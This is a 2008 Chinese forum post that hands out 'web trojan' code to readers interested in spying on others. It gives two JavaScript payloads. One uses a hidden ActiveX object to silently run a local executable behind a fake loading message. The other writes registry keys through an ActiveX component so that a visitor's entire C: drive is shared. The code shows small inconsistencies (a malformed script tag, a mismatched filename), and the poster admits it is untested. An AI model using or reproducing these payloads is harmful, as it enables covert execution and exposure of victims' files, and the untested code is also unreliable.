| 该用户匿名发帖 发表于 2008-2-16 22:48 只看TA 1楼 |
|---|
| 该用户已被删除 |
|
[交流] 给大家发个网马的制作方法 有时候有的朋友喜欢捣鼓点新奇的东西,呵呵,也有人喜欢看别人的隐私,这是狼友的习性。在下偶尔在网络上看到一个非常简单的做木马的小程序,有兴趣的朋友可以试下~ 这里主要是以网页木马的制作~! 会计算机汇编语言吗?不会~!没关系,那会浏览网站下载别人作好的吗?不会~!没关系,那你会瞅别人登陆时输入的密码吗~!不会~!没关系,你可以省网费了~! 给你个网马制作。 <script language="javascript"> run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\"" run_exe+="CODEBASE=\"test.exe#version=1,1,1,1\">" run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">" run_exe+="</OBJECT>" run_exe+="<HTML><H1>网页加载中,请稍后....</H1></HTML>"; document.open(); document.clear(); document.writeln(run_exe); document.close(); </script> 再在桌面下随便找个exe的文件,名字一定要改为tset.exe,好了,这时候双击我们刚才生成的html文件,当看到“网页加载中,请稍后....”的时候,我们的那个同路径下的exe文件也被无条件执行了,这种页面的优点就是编译修改简单,但是!当你申请下了一个个人主页空间的时候,把这两个文件上传上去的时候,当你试图通过浏览器浏览你的杰作的时候,ie的安全警告跳了出来,我想没有几个人愿意乖乖的冒着风险去点“是”,好了,尽管这个网页木马在本地是多么的完美,但是放到了网上就通不过ie的安全策略了,这个小马失败了。 2.是通过ie自身的漏洞写入注册表,相信很多人经常在浏览一些主页的时候,注册表被改的乱七八糟、ie标题被改、首页被改、注册表编辑器被禁用等等,这些都是自动修改了你的注册表的网页的杰作,所以我门也可以做个页面让浏览者的硬盘完全共享,也是做个html的文件,内容如下: script language=javascript> document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>"); function f(){ a1=document.applets[0]; a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Shl = a1.GetObject(); Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402,"REG_DWORD"); Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD" ); Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\"); } function init() { setTimeout("f()", 1000); } init(); </script> 我没运行过,也没使用过,在网上找的,随便看了下,没有发现什么错误~! |
| 0 |
